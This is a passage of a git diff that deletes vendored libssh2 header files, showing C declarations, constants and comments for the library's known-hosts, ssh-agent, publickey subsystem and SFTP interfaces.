-#define libssh2_channel_flush(channel) libssh2_channel_flush_ex((channel), 0)
-#define libssh2_channel_flush_stderr(channel) \
- libssh2_channel_flush_ex((channel), SSH_EXTENDED_DATA_STDERR)
-
-LIBSSH2_API int libssh2_channel_get_exit_status(LIBSSH2_CHANNEL* channel);
-LIBSSH2_API int libssh2_channel_get_exit_signal(LIBSSH2_CHANNEL* channel,
-                                                char **exitsignal,
-                                                size_t *exitsignal_len,
-                                                char **errmsg,
-                                                size_t *errmsg_len,
-                                                char **langtag,
-                                                size_t *langtag_len);
-LIBSSH2_API int libssh2_channel_send_eof(LIBSSH2_CHANNEL *channel);
-LIBSSH2_API int libssh2_channel_eof(LIBSSH2_CHANNEL *channel);
-LIBSSH2_API int libssh2_channel_wait_eof(LIBSSH2_CHANNEL *channel);
-LIBSSH2_API int libssh2_channel_close(LIBSSH2_CHANNEL *channel);
-LIBSSH2_API int libssh2_channel_wait_closed(LIBSSH2_CHANNEL *channel);
-LIBSSH2_API int libssh2_channel_free(LIBSSH2_CHANNEL *channel);
-
-/* libssh2_scp_recv is DEPRECATED, do not use! */
-LIBSSH2_API LIBSSH2_CHANNEL *libssh2_scp_recv(LIBSSH2_SESSION *session,
-                                              const char *path,
-                                              struct stat *sb);
-/* Use libssh2_scp_recv2 for large (> 2GB) file support on windows */
-LIBSSH2_API LIBSSH2_CHANNEL *libssh2_scp_recv2(LIBSSH2_SESSION *session,
-                                               const char *path,
-                                               libssh2_struct_stat *sb);
-LIBSSH2_API LIBSSH2_CHANNEL *libssh2_scp_send_ex(LIBSSH2_SESSION *session,
-                                                 const char *path, int mode,
-                                                 size_t size, long mtime,
-                                                 long atime);
-LIBSSH2_API LIBSSH2_CHANNEL *
-libssh2_scp_send64(LIBSSH2_SESSION *session, const char *path, int mode,
-                   libssh2_int64_t size, time_t mtime, time_t atime);
-
-#define libssh2_scp_send(session, path, mode, size) \
-  libssh2_scp_send_ex((session), (path), (mode), (size), 0, 0)
-
-LIBSSH2_API int libssh2_base64_decode(LIBSSH2_SESSION *session, char **dest,
-                                      unsigned int *dest_len,
-                                      const char *src, unsigned int src_len);
-
-LIBSSH2_API
-const char *libssh2_version(int req_version_num);
-
-#define HAVE_LIBSSH2_KNOWNHOST_API 0x010101 /* since 1.1.1 */
-#define HAVE_LIBSSH2_VERSION_API   0x010100 /* libssh2_version since 1.1 */
-
-struct libssh2_knownhost {
-    unsigned int magic;  /* magic stored by the library */
-    void *node; /* handle to the internal representation of this host */
-    char *name; /* this is NULL if no plain text host name exists */
-    char *key;  /* key in base64/printable format */
-    int typemask;
-};
-
-/*
- * libssh2_knownhost_init
- *
- * Init a collection of known hosts. Returns the pointer to a collection.
- *
- */
-LIBSSH2_API LIBSSH2_KNOWNHOSTS *
-libssh2_knownhost_init(LIBSSH2_SESSION *session);
-
-/*
- * libssh2_knownhost_add
- *
- * Add a host and its associated key to the collection of known hosts.
- *
- * The 'type' argument specifies on what format the given host and keys are:
- *
- * plain  - ascii "hostname.domain.tld"
- * sha1   - SHA1(<salt> <host>) base64-encoded!
- * custom - another hash
- *
- * If 'sha1' is selected as type, the salt must be provided to the salt
- * argument. This too base64 encoded.
- *
- * The SHA-1 hash is what OpenSSH can be told to use in known_hosts files.  If
- * a custom type is used, salt is ignored and you must provide the host
- * pre-hashed when checking for it in the libssh2_knownhost_check() function.
- *
- * The keylen parameter may be omitted (zero) if the key is provided as a
- * NULL-terminated base64-encoded string.
- */
-
-/* host format (2 bits) */
-#define LIBSSH2_KNOWNHOST_TYPE_MASK    0xffff
-#define LIBSSH2_KNOWNHOST_TYPE_PLAIN   1
-#define LIBSSH2_KNOWNHOST_TYPE_SHA1    2 /* always base64 encoded */
-#define LIBSSH2_KNOWNHOST_TYPE_CUSTOM  3
-
-/* key format (2 bits) */
-#define LIBSSH2_KNOWNHOST_KEYENC_MASK     (3<<16)
-#define LIBSSH2_KNOWNHOST_KEYENC_RAW      (1<<16)
-#define LIBSSH2_KNOWNHOST_KEYENC_BASE64   (2<<16)
-
-/* type of key (2 bits) */
-#define LIBSSH2_KNOWNHOST_KEY_MASK     (7<<18)
-#define LIBSSH2_KNOWNHOST_KEY_SHIFT    18
-#define LIBSSH2_KNOWNHOST_KEY_RSA1     (1<<18)
-#define LIBSSH2_KNOWNHOST_KEY_SSHRSA   (2<<18)
-#define LIBSSH2_KNOWNHOST_KEY_SSHDSS   (3<<18)
-#define LIBSSH2_KNOWNHOST_KEY_UNKNOWN  (7<<18)
-
-LIBSSH2_API int
-libssh2_knownhost_add(LIBSSH2_KNOWNHOSTS *hosts,
-                      const char *host,
-                      const char *salt,
-                      const char *key, size_t keylen, int typemask,
-                      struct libssh2_knownhost **store);
-
-/*
- * libssh2_knownhost_addc
- *
- * Add a host and its associated key to the collection of known hosts.
- *
- * Takes a comment argument that may be NULL.  A NULL comment indicates
- * there is no comment and the entry will end directly after the key
- * when written out to a file.  An empty string "" comment will indicate an
- * empty comment which will cause a single space to be written after the key.
- *
- * The 'type' argument specifies on what format the given host and keys are:
- *
- * plain  - ascii "hostname.domain.tld"
- * sha1   - SHA1(<salt> <host>) base64-encoded!
- * custom - another hash
- *
- * If 'sha1' is selected as type, the salt must be provided to the salt
- * argument. This too base64 encoded.
- *
- * The SHA-1 hash is what OpenSSH can be told to use in known_hosts files.  If
- * a custom type is used, salt is ignored and you must provide the host
- * pre-hashed when checking for it in the libssh2_knownhost_check() function.
- *
- * The keylen parameter may be omitted (zero) if the key is provided as a
- * NULL-terminated base64-encoded string.
- */
-
-LIBSSH2_API int
-libssh2_knownhost_addc(LIBSSH2_KNOWNHOSTS *hosts,
-                       const char *host,
-                       const char *salt,
-                       const char *key, size_t keylen,
-                       const char *comment, size_t commentlen, int typemask,
-                       struct libssh2_knownhost **store);
-
-/*
- * libssh2_knownhost_check
- *
- * Check a host and its associated key against the collection of known hosts.
- *
- * The type is the type/format of the given host name.
- *
- * plain  - ascii "hostname.domain.tld"
- * custom - prehashed base64 encoded. Note that this cannot use any salts.
- *
- *
- * 'knownhost' may be set to NULL if you don't care about that info.
- *
- * Returns:
- *
- * LIBSSH2_KNOWNHOST_CHECK_* values, see below
- *
- */
-
-#define LIBSSH2_KNOWNHOST_CHECK_MATCH    0
-#define LIBSSH2_KNOWNHOST_CHECK_MISMATCH 1
-#define LIBSSH2_KNOWNHOST_CHECK_NOTFOUND 2
-#define LIBSSH2_KNOWNHOST_CHECK_FAILURE  3
-
-LIBSSH2_API int
-libssh2_knownhost_check(LIBSSH2_KNOWNHOSTS *hosts,
-                        const char *host, const char *key, size_t keylen,
-                        int typemask,
-                        struct libssh2_knownhost **knownhost);
-
-/* this function is identital to the above one, but also takes a port
-   argument that allows libssh2 to do a better check */
-LIBSSH2_API int
-libssh2_knownhost_checkp(LIBSSH2_KNOWNHOSTS *hosts,
-                         const char *host, int port,
-                         const char *key, size_t keylen,
-                         int typemask,
-                         struct libssh2_knownhost **knownhost);
-
-/*
- * libssh2_knownhost_del
- *
- * Remove a host from the collection of known hosts. The 'entry' struct is
- * retrieved by a call to libssh2_knownhost_check().
- *
- */
-LIBSSH2_API int
-libssh2_knownhost_del(LIBSSH2_KNOWNHOSTS *hosts,
-                      struct libssh2_knownhost *entry);
-
-/*
- * libssh2_knownhost_free
- *
- * Free an entire collection of known hosts.
- *
- */
-LIBSSH2_API void
-libssh2_knownhost_free(LIBSSH2_KNOWNHOSTS *hosts);
-
-/*
- * libssh2_knownhost_readline()
- *
- * Pass in a line of a file of 'type'. It makes libssh2 read this line.
- *
- * LIBSSH2_KNOWNHOST_FILE_OPENSSH is the only supported type.
- *
- */
-LIBSSH2_API int
-libssh2_knownhost_readline(LIBSSH2_KNOWNHOSTS *hosts,
-                           const char *line, size_t len, int type);
-
-/*
- * libssh2_knownhost_readfile
- *
- * Add hosts+key pairs from a given file.
- *
- * Returns a negative value for error or number of successfully added hosts.
- *
- * This implementation currently only knows one 'type' (openssh), all others
- * are reserved for future use.
- */
-
-#define LIBSSH2_KNOWNHOST_FILE_OPENSSH 1
-
-LIBSSH2_API int
-libssh2_knownhost_readfile(LIBSSH2_KNOWNHOSTS *hosts,
-                           const char *filename, int type);
-
-/*
- * libssh2_knownhost_writeline()
- *
- * Ask libssh2 to convert a known host to an output line for storage.
- *
- * Note that this function returns LIBSSH2_ERROR_BUFFER_TOO_SMALL if the given
- * output buffer is too small to hold the desired output.
- *
- * This implementation currently only knows one 'type' (openssh), all others
- * are reserved for future use.
- *
- */
-LIBSSH2_API int
-libssh2_knownhost_writeline(LIBSSH2_KNOWNHOSTS *hosts,
-                            struct libssh2_knownhost *known,
-                            char *buffer, size_t buflen,
-                            size_t *outlen, /* the amount of written data */
-                            int type);
-
-/*
- * libssh2_knownhost_writefile
- *
- * Write hosts+key pairs to a given file.
- *
- * This implementation currently only knows one 'type' (openssh), all others
- * are reserved for future use.
- */
-
-LIBSSH2_API int
-libssh2_knownhost_writefile(LIBSSH2_KNOWNHOSTS *hosts,
-                            const char *filename, int type);
-
-/*
- * libssh2_knownhost_get()
- *
- * Traverse the internal list of known hosts. Pass NULL to 'prev' to get
- * the first one. Or pass a poiner to the previously returned one to get the
- * next.
- *
- * Returns:
- * 0 if a fine host was stored in 'store'
- * 1 if end of hosts
- * [negative] on errors
- */
-LIBSSH2_API int
-libssh2_knownhost_get(LIBSSH2_KNOWNHOSTS *hosts,
-                      struct libssh2_knownhost **store,
-                      struct libssh2_knownhost *prev);
-
-#define HAVE_LIBSSH2_AGENT_API 0x010202 /* since 1.2.2 */
-
-struct libssh2_agent_publickey {
-    unsigned int magic;              /* magic stored by the library */
-    void *node;     /* handle to the internal representation of key */
-    unsigned char *blob;           /* public key blob */
-    size_t blob_len;               /* length of the public key blob */
-    char *comment;                 /* comment in printable format */
-};
-
-/*
- * libssh2_agent_init
- *
- * Init an ssh-agent handle. Returns the pointer to the handle.
- *
- */
-LIBSSH2_API LIBSSH2_AGENT *
-libssh2_agent_init(LIBSSH2_SESSION *session);
-
-/*
- * libssh2_agent_connect()
- *
- * Connect to an ssh-agent.
- *
- * Returns 0 if succeeded, or a negative value for error.
- */
-LIBSSH2_API int
-libssh2_agent_connect(LIBSSH2_AGENT *agent);
-
-/*
- * libssh2_agent_list_identities()
- *
- * Request an ssh-agent to list identities.
- *
- * Returns 0 if succeeded, or a negative value for error.
- */
-LIBSSH2_API int
-libssh2_agent_list_identities(LIBSSH2_AGENT *agent);
-
-/*
- * libssh2_agent_get_identity()
- *
- * Traverse the internal list of public keys. Pass NULL to 'prev' to get
- * the first one. Or pass a poiner to the previously returned one to get the
- * next.
- *
- * Returns:
- * 0 if a fine public key was stored in 'store'
- * 1 if end of public keys
- * [negative] on errors
- */
-LIBSSH2_API int
-libssh2_agent_get_identity(LIBSSH2_AGENT *agent,
-               struct libssh2_agent_publickey **store,
-               struct libssh2_agent_publickey *prev);
-
-/*
- * libssh2_agent_userauth()
- *
- * Do publickey user authentication with the help of ssh-agent.
- *
- * Returns 0 if succeeded, or a negative value for error.
- */
-LIBSSH2_API int
-libssh2_agent_userauth(LIBSSH2_AGENT *agent,
-               const char *username,
-               struct libssh2_agent_publickey *identity);
-
-/*
- * libssh2_agent_disconnect()
- *
- * Close a connection to an ssh-agent.
- *
- * Returns 0 if succeeded, or a negative value for error.
- */
-LIBSSH2_API int
-libssh2_agent_disconnect(LIBSSH2_AGENT *agent);
-
-/*
- * libssh2_agent_free()
- *
- * Free an ssh-agent handle.  This function also frees the internal
- * collection of public keys.
- */
-LIBSSH2_API void
-libssh2_agent_free(LIBSSH2_AGENT *agent);
-
-
-/*
- * libssh2_keepalive_config()
- *
- * Set how often keepalive messages should be sent.  WANT_REPLY
- * indicates whether the keepalive messages should request a response
- * from the server.  INTERVAL is number of seconds that can pass
- * without any I/O, use 0 (the default) to disable keepalives.  To
- * avoid some busy-loop corner-cases, if you specify an interval of 1
- * it will be treated as 2.
- *
- * Note that non-blocking applications are responsible for sending the
- * keepalive messages using libssh2_keepalive_send().
- */
-LIBSSH2_API void libssh2_keepalive_config (LIBSSH2_SESSION *session,
-                                           int want_reply,
-                                           unsigned interval);
-
-/*
- * libssh2_keepalive_send()
- *
- * Send a keepalive message if needed.  SECONDS_TO_NEXT indicates how
- * many seconds you can sleep after this call before you need to call
- * it again.  Returns 0 on success, or LIBSSH2_ERROR_SOCKET_SEND on
- * I/O errors.
- */
-LIBSSH2_API int libssh2_keepalive_send (LIBSSH2_SESSION *session,
-                                        int *seconds_to_next);
-
-/* NOTE NOTE NOTE
-   libssh2_trace() has no function in builds that aren't built with debug
-   enabled
- */
-LIBSSH2_API int libssh2_trace(LIBSSH2_SESSION *session, int bitmask);
-#define LIBSSH2_TRACE_TRANS (1<<1)
-#define LIBSSH2_TRACE_KEX   (1<<2)
-#define LIBSSH2_TRACE_AUTH  (1<<3)
-#define LIBSSH2_TRACE_CONN  (1<<4)
-#define LIBSSH2_TRACE_SCP   (1<<5)
-#define LIBSSH2_TRACE_SFTP  (1<<6)
-#define LIBSSH2_TRACE_ERROR (1<<7)
-#define LIBSSH2_TRACE_PUBLICKEY (1<<8)
-#define LIBSSH2_TRACE_SOCKET (1<<9)
-
-typedef void (*libssh2_trace_handler_func)(LIBSSH2_SESSION*,
-                                           void*,
-                                           const char *,
-                                           size_t);
-LIBSSH2_API int libssh2_trace_sethandler(LIBSSH2_SESSION *session,
-                                         void* context,
-                                         libssh2_trace_handler_func callback);
-
-#ifdef __cplusplus
-} /* extern "C" */
-#endif
-
-#endif /* !RC_INVOKED */
-
-#endif /* LIBSSH2_H */
diff --git a/thirdparty/libssh2/include/libssh2_publickey.h b/thirdparty/libssh2/include/libssh2_publickey.h
deleted file mode 100644
index 0979e23..0000000
--- a/thirdparty/libssh2/include/libssh2_publickey.h
+++ /dev/null
@@ -1,119 +0,0 @@
-/* Copyright (c) 2004-2006, Sara Golemon <sarag@libssh2.org>
- * All rights reserved.
- *
- * Redistribution and use in source and binary forms,
- * with or without modification, are permitted provided
- * that the following conditions are met:
- *
- *   Redistributions of source code must retain the above
- *   copyright notice, this list of conditions and the
- *   following disclaimer.
- *
- *   Redistributions in binary form must reproduce the above
- *   copyright notice, this list of conditions and the following
- *   disclaimer in the documentation and/or other materials
- *   provided with the distribution.
- *
- *   Neither the name of the copyright holder nor the names
- *   of any other contributors may be used to endorse or
- *   promote products derived from this software without
- *   specific prior written permission.
- *
- * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
- * CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
- * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
- * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
- * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
- * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
- * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
- * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
- * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
- * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
- * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
- * OF SUCH DAMAGE.
- */
-
-/* Note: This include file is only needed for using the
- * publickey SUBSYSTEM which is not the same as publickey
- * authentication.  For authentication you only need libssh2.h
- *
- * For more information on the publickey subsystem,
- * refer to IETF draft: secsh-publickey
- */
-
-#ifndef LIBSSH2_PUBLICKEY_H
-#define LIBSSH2_PUBLICKEY_H 1
-
-#include "libssh2.h"
-
-typedef struct _LIBSSH2_PUBLICKEY               LIBSSH2_PUBLICKEY;
-
-typedef struct _libssh2_publickey_attribute {
-    const char *name;
-    unsigned long name_len;
-    const char *value;
-    unsigned long value_len;
-    char mandatory;
-} libssh2_publickey_attribute;
-
-typedef struct _libssh2_publickey_list {
-    unsigned char *packet; /* For freeing */
-
-    const unsigned char *name;
-    unsigned long name_len;
-    const unsigned char *blob;
-    unsigned long blob_len;
-    unsigned long num_attrs;
-    libssh2_publickey_attribute *attrs; /* free me */
-} libssh2_publickey_list;
-
-/* Generally use the first macro here, but if both name and value are string
-   literals, you can use _fast() to take advantage of preprocessing */
-#define libssh2_publickey_attribute(name, value, mandatory) \
-  { (name), strlen(name), (value), strlen(value), (mandatory) },
-#define libssh2_publickey_attribute_fast(name, value, mandatory) \
-  { (name), sizeof(name) - 1, (value), sizeof(value) - 1, (mandatory) },
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-/* Publickey Subsystem */
-LIBSSH2_API LIBSSH2_PUBLICKEY *libssh2_publickey_init(LIBSSH2_SESSION *session);
-
-LIBSSH2_API int libssh2_publickey_add_ex(LIBSSH2_PUBLICKEY *pkey,
-                                         const unsigned char *name,
-                                         unsigned long name_len,
-                                         const unsigned char *blob,
-                                         unsigned long blob_len, char overwrite,
-                                         unsigned long num_attrs,
-                                         const libssh2_publickey_attribute attrs[]);
-#define libssh2_publickey_add(pkey, name, blob, blob_len, overwrite, \
-                              num_attrs, attrs)                         \
-  libssh2_publickey_add_ex((pkey), (name), strlen(name), (blob), (blob_len), \
-                           (overwrite), (num_attrs), (attrs))
-
-LIBSSH2_API int libssh2_publickey_remove_ex(LIBSSH2_PUBLICKEY *pkey,
-                                            const unsigned char *name,
-                                            unsigned long name_len,
-                                            const unsigned char *blob,
-                                            unsigned long blob_len);
-#define libssh2_publickey_remove(pkey, name, blob, blob_len) \
-  libssh2_publickey_remove_ex((pkey), (name), strlen(name), (blob), (blob_len))
-
-LIBSSH2_API int
-libssh2_publickey_list_fetch(LIBSSH2_PUBLICKEY *pkey,
-                             unsigned long *num_keys,
-                             libssh2_publickey_list **pkey_list);
-LIBSSH2_API void libssh2_publickey_list_free(LIBSSH2_PUBLICKEY *pkey,
-                                             libssh2_publickey_list *pkey_list);
-
-LIBSSH2_API int libssh2_publickey_shutdown(LIBSSH2_PUBLICKEY *pkey);
-
-#ifdef __cplusplus
-} /* extern "C" */
-#endif
-
-#endif /* ifndef: LIBSSH2_PUBLICKEY_H */
diff --git a/thirdparty/libssh2/include/libssh2_sftp.h b/thirdparty/libssh2/include/libssh2_sftp.h
deleted file mode 100644
index 677faf2..0000000
--- a/thirdparty/libssh2/include/libssh2_sftp.h
+++ /dev/null
@@ -1,346 +0,0 @@
-/* Copyright (c) 2004-2008, Sara Golemon <sarag@libssh2.org>
- * All rights reserved.
- *
- * Redistribution and use in source and binary forms,
- * with or without modification, are permitted provided
- * that the following conditions are met:
- *
- *   Redistributions of source code must retain the above
- *   copyright notice, this list of conditions and the
- *   following disclaimer.
- *
- *   Redistributions in binary form must reproduce the above
- *   copyright notice, this list of conditions and the following
- *   disclaimer in the documentation and/or other materials
- *   provided with the distribution.
- *
- *   Neither the name of the copyright holder nor the names
- *   of any other contributors may be used to endorse or
- *   promote products derived from this software without
- *   specific prior written permission.
- *
- * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
- * CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
- * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
- * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
- * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
- * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
- * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
- * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
- * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
- * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
- * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
- * OF SUCH DAMAGE.
- */
-
-#ifndef LIBSSH2_SFTP_H
-#define LIBSSH2_SFTP_H 1
-
-#include "libssh2.h"
-
-#ifndef WIN32
-#include <unistd.h>
-#endif
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-/* Note: Version 6 was documented at the time of writing
- * However it was marked as "DO NOT IMPLEMENT" due to pending changes
- *
- * Let's start with Version 3 (The version found in OpenSSH) and go from there
- */
-#define LIBSSH2_SFTP_VERSION        3
-
-typedef struct _LIBSSH2_SFTP                LIBSSH2_SFTP;
-typedef struct _LIBSSH2_SFTP_HANDLE         LIBSSH2_SFTP_HANDLE;
-typedef struct _LIBSSH2_SFTP_ATTRIBUTES     LIBSSH2_SFTP_ATTRIBUTES;
-typedef struct _LIBSSH2_SFTP_STATVFS        LIBSSH2_SFTP_STATVFS;
-
-/* Flags for open_ex() */
-#define LIBSSH2_SFTP_OPENFILE           0
-#define LIBSSH2_SFTP_OPENDIR            1
-
-/* Flags for rename_ex() */
-#define LIBSSH2_SFTP_RENAME_OVERWRITE   0x00000001
-#define LIBSSH2_SFTP_RENAME_ATOMIC      0x00000002
-#define LIBSSH2_SFTP_RENAME_NATIVE      0x00000004
-
-/* Flags for stat_ex() */
-#define LIBSSH2_SFTP_STAT               0
-#define LIBSSH2_SFTP_LSTAT              1
-#define LIBSSH2_SFTP_SETSTAT            2
-
-/* Flags for symlink_ex() */
-#define LIBSSH2_SFTP_SYMLINK            0
-#define LIBSSH2_SFTP_READLINK           1
-#define LIBSSH2_SFTP_REALPATH           2
-
-/* SFTP attribute flag bits */
-#define LIBSSH2_SFTP_ATTR_SIZE              0x00000001
-#define LIBSSH2_SFTP_ATTR_UIDGID            0x00000002
-#define LIBSSH2_SFTP_ATTR_PERMISSIONS       0x00000004
-#define LIBSSH2_SFTP_ATTR_ACMODTIME         0x00000008
-#define LIBSSH2_SFTP_ATTR_EXTENDED          0x80000000
-
-/* SFTP statvfs flag bits */
-#define LIBSSH2_SFTP_ST_RDONLY              0x00000001
-#define LIBSSH2_SFTP_ST_NOSUID              0x00000002
-
-struct _LIBSSH2_SFTP_ATTRIBUTES {
-    /* If flags & ATTR_* bit is set, then the value in this struct will be
-     * meaningful Otherwise it should be ignored
-     */
-    unsigned long flags;
-
-    libssh2_uint64_t filesize;
-    unsigned long uid, gid;
-    unsigned long permissions;
-    unsigned long atime, mtime;
-};
-
-struct _LIBSSH2_SFTP_STATVFS {
-    libssh2_uint64_t  f_bsize;    /* file system block size */
-    libssh2_uint64_t  f_frsize;   /* fragment size */
-    libssh2_uint64_t  f_blocks;   /* size of fs in f_frsize units */
-    libssh2_uint64_t  f_bfree;    /* # free blocks */
-    libssh2_uint64_t  f_bavail;   /* # free blocks for non-root */
-    libssh2_uint64_t  f_files;    /* # inodes */
-    libssh2_uint64_t  f_ffree;    /* # free inodes */
-    libssh2_uint64_t  f_favail;   /* # free inodes for non-root */
-    libssh2_uint64_t  f_fsid;     /* file system ID */
-    libssh2_uint64_t  f_flag;     /* mount flags */
-    libssh2_uint64_t  f_namemax;  /* maximum filename length */
-};
-
-/* SFTP filetypes */
-#define LIBSSH2_SFTP_TYPE_REGULAR           1
-#define LIBSSH2_SFTP_TYPE_DIRECTORY         2
-#define LIBSSH2_SFTP_TYPE_SYMLINK           3
-#define LIBSSH2_SFTP_TYPE_SPECIAL           4
-#define LIBSSH2_SFTP_TYPE_UNKNOWN           5
-#define LIBSSH2_SFTP_TYPE_SOCKET            6
-#define LIBSSH2_SFTP_TYPE_CHAR_DEVICE       7
-#define LIBSSH2_SFTP_TYPE_BLOCK_DEVICE      8
-#define LIBSSH2_SFTP_TYPE_FIFO              9
-
-/*
- * Reproduce the POSIX file modes here for systems that are not POSIX
- * compliant.
- *
- * These is used in "permissions" of "struct _LIBSSH2_SFTP_ATTRIBUTES"
- */
-/* File type */
-#define LIBSSH2_SFTP_S_IFMT         0170000     /* type of file mask */
-#define LIBSSH2_SFTP_S_IFIFO        0010000     /* named pipe (fifo) */
-#define LIBSSH2_SFTP_S_IFCHR        0020000     /* character special */
-#define LIBSSH2_SFTP_S_IFDIR        0040000     /* directory */
-#define LIBSSH2_SFTP_S_IFBLK        0060000     /* block special */
-#define LIBSSH2_SFTP_S_IFREG        0100000     /* regular */
-#define LIBSSH2_SFTP_S_IFLNK        0120000     /* symbolic link */
-#define LIBSSH2_SFTP_S_IFSOCK       0140000     /* socket */
-
-/* File mode */
-/* Read, write, execute/search by owner */
-#define LIBSSH2_SFTP_S_IRWXU        0000700     /* RWX mask for owner */
-#define LIBSSH2_SFTP_S_IRUSR        0000400     /* R for owner */
-#define LIBSSH2_SFTP_S_IWUSR        0000200     /* W for owner */
-#define LIBSSH2_SFTP_S_IXUSR        0000100     /* X for owner */
-/* Read, write, execute/search by group */
-#define LIBSSH2_SFTP_S_IRWXG        0000070     /* RWX mask for group */
-#define LIBSSH2_SFTP_S_IRGRP        0000040     /* R for group */
-#define LIBSSH2_SFTP_S_IWGRP        0000020     /* W for group */
-#define LIBSSH2_SFTP_S_IXGRP        0000010     /* X for group */
-/* Read, write, execute/search by others */
-#define LIBSSH2_SFTP_S_IRWXO        0000007     /* RWX mask for other */
-#define LIBSSH2_SFTP_S_IROTH        0000004     /* R for other */
-#define LIBSSH2_SFTP_S_IWOTH        0000002     /* W for other */
-#define LIBSSH2_SFTP_S_IXOTH        0000001     /* X for other */
-
-/* macros to check for specific file types, added in 1.2.5 */
-#define LIBSSH2_SFTP_S_ISLNK(m) \
-  (((m) & LIBSSH2_SFTP_S_IFMT) == LIBSSH2_SFTP_S_IFLNK)
-#define LIBSSH2_SFTP_S_ISREG(m) \
-  (((m) & LIBSSH2_SFTP_S_IFMT) == LIBSSH2_SFTP_S_IFREG)
-#define LIBSSH2_SFTP_S_ISDIR(m) \
-  (((m) & LIBSSH2_SFTP_S_IFMT) == LIBSSH2_SFTP_S_IFDIR)
-#define LIBSSH2_SFTP_S_ISCHR(m) \
-  (((m) & LIBSSH2_SFTP_S_IFMT) == LIBSSH2_SFTP_S_IFCHR)
-#define LIBSSH2_SFTP_S_ISBLK(m) \
-  (((m) & LIBSSH2_SFTP_S_IFMT) == LIBSSH2_SFTP_S_IFBLK)
-#define LIBSSH2_SFTP_S_ISFIFO(m) \
-  (((m) & LIBSSH2_SFTP_S_IFMT) == LIBSSH2_SFTP_S_IFIFO)
-#define LIBSSH2_SFTP_S_ISSOCK(m) \
-  (((m) & LIBSSH2_SFTP_S_IFMT) == LIBSSH2_SFTP_S_IFSOCK)
-
-/* SFTP File Transfer Flags -- (e.g. flags parameter to sftp_open())
- * Danger will robinson... APPEND doesn't have any effect on OpenSSH servers */
-#define LIBSSH2_FXF_READ                        0x00000001
-#define LIBSSH2_FXF_WRITE                       0x00000002
-#define LIBSSH2_FXF_APPEND                      0x00000004
-#define LIBSSH2_FXF_CREAT                       0x00000008
-#define LIBSSH2_FXF_TRUNC                       0x00000010
-#define LIBSSH2_FXF_EXCL                        0x00000020
-
-/* SFTP Status Codes (returned by libssh2_sftp_last_error() ) */
-#define LIBSSH2_FX_OK                       0
-#define LIBSSH2_FX_EOF                      1
-#define LIBSSH2_FX_NO_SUCH_FILE             2
-#define LIBSSH2_FX_PERMISSION_DENIED        3
-#define LIBSSH2_FX_FAILURE                  4
-#define LIBSSH2_FX_BAD_MESSAGE              5
-#define LIBSSH2_FX_NO_CONNECTION            6
-#define LIBSSH2_FX_CONNECTION_LOST          7
-#define LIBSSH2_FX_OP_UNSUPPORTED           8
-#define LIBSSH2_FX_INVALID_HANDLE           9
-#define LIBSSH2_FX_NO_SUCH_PATH             10
-#define LIBSSH2_FX_FILE_ALREADY_EXISTS      11
-#define LIBSSH2_FX_WRITE_PROTECT            12
-#define LIBSSH2_FX_NO_MEDIA                 13
-#define LIBSSH2_FX_NO_SPACE_ON_FILESYSTEM   14
-#define LIBSSH2_FX_QUOTA_EXCEEDED           15
-#define LIBSSH2_FX_UNKNOWN_PRINCIPLE        16 /* Initial mis-spelling */
-#define LIBSSH2_FX_UNKNOWN_PRINCIPAL        16
-#define LIBSSH2_FX_LOCK_CONFlICT            17 /* Initial mis-spelling */
-#define LIBSSH2_FX_LOCK_CONFLICT            17
-#define LIBSSH2_FX_DIR_NOT_EMPTY            18
-#define LIBSSH2_FX_NOT_A_DIRECTORY          19
-#define LIBSSH2_FX_INVALID_FILENAME         20
-#define LIBSSH2_FX_LINK_LOOP                21
-
-/* Returned by any function that would block during a read/write opperation */
-#define LIBSSH2SFTP_EAGAIN LIBSSH2_ERROR_EAGAIN
-
-/* SFTP API */
-LIBSSH2_API LIBSSH2_SFTP *libssh2_sftp_init(LIBSSH2_SESSION *session);
-LIBSSH2_API int libssh2_sftp_shutdown(LIBSSH2_SFTP *sftp);
-LIBSSH2_API unsigned long libssh2_sftp_last_error(LIBSSH2_SFTP *sftp);
-LIBSSH2_API LIBSSH2_CHANNEL *libssh2_sftp_get_channel(LIBSSH2_SFTP *sftp);
-
-/* File / Directory Ops */
-LIBSSH2_API LIBSSH2_SFTP_HANDLE *libssh2_sftp_open_ex(LIBSSH2_SFTP *sftp,
-                                                      const char *filename,
-                                                      unsigned int filename_len,
-                                                      unsigned long flags,
-                                                      long mode, int open_type);
-#define libssh2_sftp_open(sftp, filename, flags, mode) \
-    libssh2_sftp_open_ex((sftp), (filename), strlen(filename), (flags), \
-                         (mode), LIBSSH2_SFTP_OPENFILE)
